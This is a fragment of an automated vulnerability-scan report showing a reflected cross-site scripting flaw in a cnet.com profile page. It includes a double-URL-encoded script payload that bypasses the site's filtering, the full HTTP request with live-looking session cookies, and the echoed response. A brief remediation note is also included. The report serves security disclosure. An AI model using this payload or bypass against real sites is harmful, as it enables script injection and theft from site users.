P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=993
Connection: Keep-Alive
Content-Length: 31075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>wcunning40263<script>alert(1)</script>375fbdcdad9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ea7c698f10 was submitted in the REST URL parameter 2. This input was echoed as 3f458"><script>alert(1)</script>3ea7c698f10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/wcunning3f458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ea7c698f10/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:23 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:23 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=983
Connection: Keep-Alive
Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="wcunning3f458"><script>alert(1)</script>3ea7c698f10"/> ...[SNIP]...
Report generated by Hoyt LLCr at Tue Nov 16 18:22:15 CST 2010.